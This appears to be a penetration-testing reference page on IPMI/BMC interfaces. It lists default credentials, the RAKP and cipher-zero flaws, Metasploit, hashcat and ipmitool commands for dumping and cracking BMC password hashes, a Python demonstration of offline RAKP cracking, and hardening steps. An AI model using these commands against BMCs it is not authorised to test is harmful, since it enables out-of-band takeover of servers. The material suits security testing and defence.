IPMI
aka BMC, iDRAC, iLO, Supermicro IPMI
Baseboard management controller (BMC) interface on 623/udp. An IPMI 2.0 protocol design flaw (RAKP) hands any unauthenticated client a password-keyed HMAC that it can crack offline, and widely unchanged BMC default creds grant full out-of-band control of the server.
Ports
| Port | Proto | Notes |
|---|---|---|
| 623 | udp | IPMI over RMCP / RMCP+ (IPMI 2.0 lanplus) |
Fingerprint
- nmap -sU -p623 --script ipmi-version,ipmi-cipher-zero
- Metasploit auxiliary/scanner/ipmi/ipmi_version and auxiliary/scanner/ipmi/ipmi_cipher_zero
Default / weak creds
ADMIN / ADMIN (older Supermicro), root / calvin (older Dell iDRAC), admin / admin (generic). Newer Supermicro and Dell units ship a unique per-unit password printed on a label or pull-out tag, and HP iLO uses Administrator with a random printed password, so try the defaults but don't assume them.
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2013-4786 (IPMI 2.0 RAKP) | Protocol flaw: RAKP message 2 carries an HMAC-SHA1 keyed with the user's password, sent before the client has proven anything, so anyone who knows a valid username can collect it and crack it offline |
| CVE-2013-4782 (cipher suite 0, Supermicro; other vendors have their own IDs) | Authentication bypass: with cipher suite 0 enabled the BMC accepts any password for a valid username |
Exploitation primitives
- Metasploit auxiliary/scanner/ipmi/ipmi_dumphashes sends RAKP message 1 for a list of usernames and records each RAKP message 2 HMAC; crack with hashcat -m 7300 (IPMI2 RAKP HMAC-SHA1) or john --format=rakp
- Cipher 0 (ipmitool -I lanplus -C 0 -U <valid user> -P anything) runs commands with any password; you still need a valid username
- Default BMC credentials give full out-of-band control: web UI, KVM, power cycling, Serial-over-LAN, virtual media (boot your own ISO)
Overview
IPMI is the management processor baked into server hardware. The BMC runs its own firmware on its own SoC, independent of the host OS and of the host's power state, so a BMC compromise is effectively physical access: console, power, and disk (via virtual media) on a box the OS-level defenders may never see. The RAKP flaw makes hash retrieval almost free because the BMC authenticates itself to the client first, before the client authenticates to the BMC; a valid username is all you need.
Hash dump and crack
msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS <TARGET>; set OUTPUT_HASHCAT_FILE ipmi.hash; run; exit"
hashcat -m 7300 --username ipmi.hash rockyou.txt
The module tries a built-in username list (ADMIN, admin, root, ...) and, with CRACK_COMMON on by default, tests a handful of common passwords itself; the hashcat file carries host and username in front of the salt:hash pair, hence --username.
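The following is an added example (not from the original page, Metasploit, or hashcat) showing why the RAKP exchange is crackable: the BMC's RAKP message 2 authentication code is HMAC-SHA1 keyed with the user's password over fields that all cross the wire in the clear, so an offline guesser just recomputes it. The session IDs, nonces, GUID, and role byte are constructed values, not a real capture; the "BMC" here is a stand-in that computes what a real one would send.

```python
import hashlib
import hmac

# Constructed RAKP 1/2 exchange for user ADMIN (not a real capture). Every field
# except the password is sent unencrypted: the client picks SID_M, RAND_M, ROLE_M
# and USERNAME in RAKP message 1; the BMC answers with SID_C (earlier, in the Open
# Session Response), RAND_C, GUID_C and the HMAC in RAKP message 2.
USERNAME = "ADMIN"
ROLE_M = 0x14                           # requested privilege: Administrator, name-only lookup
SID_M = bytes.fromhex("a4a3a2a0")       # remote console session ID (attacker's choice)
SID_C = bytes.fromhex("02000000")       # BMC session ID
RAND_M = bytes.fromhex("0102030405060708090a0b0c0d0e0f10")  # attacker's 16-byte nonce
RAND_C = bytes.fromhex("8f1e2d3c4b5a69788796a5b4c3d2e1f0")  # BMC 16-byte nonce
GUID_C = bytes.fromhex("00112233445566778899aabbccddeeff")  # BMC GUID


def rakp2_salt(sid_m, sid_c, rand_m, rand_c, guid_c, role_m, username):
    """Concatenate the fields the BMC feeds into the RAKP 2 HMAC, per IPMI 2.0:
    SID_M || SID_C || R_M || R_C || GUID_C || Role_M || ULength_M || UName_M."""
    uname = username.encode()
    return sid_m + sid_c + rand_m + rand_c + guid_c + bytes([role_m, len(uname)]) + uname


def rakp2_auth_code(password, salt):
    """Key Exchange Authentication Code: HMAC-SHA1 keyed with K_UID (the user's password)."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def bmc_rakp2(password):
    """Stand-in BMC: the code it would place in RAKP message 2 for the exchange above.
    Note that it is produced before the client has proven knowledge of anything."""
    salt = rakp2_salt(SID_M, SID_C, RAND_M, RAND_C, GUID_C, ROLE_M, USERNAME)
    return rakp2_auth_code(password, salt)


def hashcat_7300_line(salt, auth_code):
    """hashcat -m 7300 input: salt_hex:hmac_hex (prefix host/user yourself if using --username)."""
    return salt.hex() + ":" + auth_code.hex()


def crack_rakp(salt, auth_code, wordlist):
    """Offline attack: recompute the HMAC with each candidate password and compare.
    Returns the matching password or None. No further traffic to the BMC is needed."""
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_auth_code(candidate, salt), auth_code):
            return candidate
    return None


def demo():
    """Capture the constructed BMC's RAKP 2 code for the real password 'calvin' and crack it."""
    salt = rakp2_salt(SID_M, SID_C, RAND_M, RAND_C, GUID_C, ROLE_M, USERNAME)
    captured = bmc_rakp2("calvin")           # attacker only sees this, never the password
    guesses = ["password", "admin", "ADMIN", "changeme", "calvin", "root"]
    return crack_rakp(salt, captured, guesses)


if __name__ == "__main__":
    salt = rakp2_salt(SID_M, SID_C, RAND_M, RAND_C, GUID_C, ROLE_M, USERNAME)
    print(hashcat_7300_line(salt, bmc_rakp2("calvin")))
    print("cracked:", demo())
```

The salt is 63 bytes for a five-character username (4 + 4 + 16 + 16 + 16 + 1 + 1 + 5); the password key is the raw password bytes, which is why a 20-character random BMC password is the only real defence once cipher 0 is off and the port is reachable.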
Hardening
The RAKP weakness is in the IPMI 2.0 spec itself, so firmware updates do not remove it; the mitigations are to make the hash not worth cracking and the port not reachable. Isolate BMCs on a dedicated management VLAN and firewall 623/udp from everything but management hosts, replace default creds with long random passwords (IPMI 2.0 allows up to 20 characters; use them all), disable or rename unused and anonymous users, disable cipher suite 0 in the BMC's cipher suite privilege settings, prefer the vendor's HTTPS/Redfish interface and turn IPMI-over-LAN off where nothing needs it, and keep firmware current for the vendor-specific bugs. Verify with the same tooling an attacker would use: run the cipher-zero check and ipmi_dumphashes against your own BMCs and confirm nothing cracks.